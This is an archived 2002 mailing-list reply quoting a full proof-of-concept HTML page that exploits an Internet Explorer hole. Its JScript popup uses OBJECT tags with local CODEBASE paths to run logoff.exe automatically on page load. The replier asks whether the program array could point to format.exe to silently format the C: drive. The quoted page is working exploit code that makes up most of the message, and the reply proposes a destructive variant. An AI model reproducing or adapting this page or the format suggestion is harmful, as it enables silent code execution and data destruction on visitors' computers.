If this is confirmed, could this array by changed to equal, erm...let's say format.exe (with a couple of parameters to silently format C:/)? var programName=new Array( 'c:/windows/system32/logoff.exe', 'c:/winxp/system32/logoff.exe', 'c:/winnt/system32/logoff.exe' On Wed, 2002-03-13 at 06:06, Magnus Bodin wrote: > On Tue, Mar 12, 2002 at 11:32:20AM +0100, Magnus Bodin wrote: > > > > The latest MSIE-hole is now spreading. > > Sorry. Something broke there with the inclusion of the code. > I've not done any large scale testing of this a part from getting reports > from a lot of friends and colleagues that they are vulnerable still after > running windows update. > > Here it is, comlete with all the pop-up-code: > > --%< cut here----- > <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> > <HTML> > <HEAD> > <TITLE>IE6 security...</TITLE> > > <META http-equiv=Content-Type content="text/html; charset=windows-1252"> > <SCRIPT language=JScript> > > var programName=new Array( > 'c:/windows/system32/logoff.exe', > 'c:/winxp/system32/logoff.exe', > 'c:/winnt/system32/logoff.exe' > ); > > function Init(){ > var oPopup=window.createPopup(); > var oPopBody=oPopup.document.body; > var n,html=''; > for(n=0;n<programName.length;n++) > html+="<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111111' CODEBASE='"+programName[n]+"' %1='r'></OBJECT>"; > oPopBody.innerHTML=html; > oPopup.show(290, 390, 200, 200, document.body); > } > > </SCRIPT> > </head> > <BODY onload="Init()"> > You should feel lucky if you dont have XP right now. > </BODY> > </HTML> > --%< cut here----- > > > -- > magnus MICROS~1 BOB was written in Lisp. > http://x42.com/ -- NyQuist | Matthew Hall -- NyQuist at ntlworld dot com -- http://NyQuist.port5.com Sig: #define QUESTION ((bb) || !(bb)) ubKey : 649779B0 (certserver.pgp.com)
This archive was generated by hypermail 2b30 : Wed Mar 13 2002 - 09:23:42 PST